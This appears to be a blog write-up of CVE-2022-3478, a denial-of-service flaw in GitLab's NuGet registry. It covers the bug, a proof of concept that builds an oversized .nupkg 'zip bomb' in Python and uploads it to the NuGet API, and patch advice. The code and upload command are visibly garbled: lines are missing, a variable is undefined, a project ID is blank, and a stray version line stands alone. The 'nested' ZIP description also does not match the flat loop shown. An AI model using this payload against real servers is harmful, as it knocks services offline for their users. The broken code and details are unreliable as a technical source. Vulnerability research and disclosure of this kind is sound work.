CVE-2022-3478 - GitLab NuGet Package Upload Denial-of-Service—A Deep Dive

In today’s DevOps culture, GitLab stands as a staple in CI/CD and source code management. But with exposure comes risk. In late 2022, one such risk—CVE-2022-3478—was discovered in GitLab’s handling of NuGet packages. This vulnerability allowed an attacker to crash GitLab by simply uploading a specially crafted package. If you maintain a GitLab instance, this long-read walks through the issue, shows you the technical details with code, and offers resources for further action.

What Is CVE-2022-3478?

CVE-2022-3478 is a Denial-of-Service (DoS) vulnerability discovered in GitLab’s NuGet package registry. Mismanagement of uploaded NuGet packages meant attackers could disrupt GitLab’s operations by submitting maliciously formatted files.

GitLab v15.6.

Fixed versions are 15.4.6, 15.5.5 and 15.6.1. You can check the official GitLab Security Release for confirmation.

The Technicality: Why NuGet?

NuGet is a Microsoft package management system for .NET, .NET Core, and Mono. GitLab supports it as a registry. But GitLab’s backend, written in Ruby, had insufficient validation; a malformed .nupkg (NuGet package) would destabilize the service.

How Does the Attack Work?

The vulnerability is triggered when GitLab tries to parse a malicious NuGet package file. For example, a NuGet package is just a ZIP container. By inserting junk or deeply nested folders, or oversized attributes, an attacker can make GitLab chew up too much memory or get stuck in processing, eventually rendering the server unresponsive.

Craft a Malicious NuGet Package

You can use basic tooling or Python’s zipfile. A simple attack is the so-called “zip bomb”: a ZIP file containing many nested ZIPs, designed to expand exponentially.

f.write("A" * 10)

# Create a zip with thousands of copies/nesting

for i in range(20000):  # Arbitrary large number

z.write("tiny.txt", f"folder{i}/tiny.txt")

Upload Target: GitLab NuGet Endpoint

Documentation: GitLab NuGet Registry

upload-file malicious.nupkg \

"https://gitlab.example.com/api/v4/projects//packages/nuget"

References

- GitLab Security Release and Advisory
- CVE Record - NVD
- GitLab NuGet Registry Docs
- Python zipfile documentation

Mitigation & Patch

- Upgrade your GitLab Install: If you run any affected version, upgrade to the latest minor version (15.4.6+, 15.5.5+, or 15.6.1+).
- Disable NuGet Registry if you don’t need it: That can be done using project/package settings.

Key Takeaways

- CVE-2022-3478 is a reminder that package management endpoints can be a hidden vector for devastating DoS attacks.

Keeping your software up to date is the best prevention.

- Validate and monitor uploads—sometimes, secure defaults and logging are the most effective defenses.

Stay safe. Patch early. And keep an eye out for what’s lurking inside those packages!


*If you need to test for this vulnerability in your own sandbox (never attack others), make sure you have the right permissions and backups! Responsible disclosure and safe practices keep the community secure for all.*

Timeline

Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/01/2023 17:16:00 UTC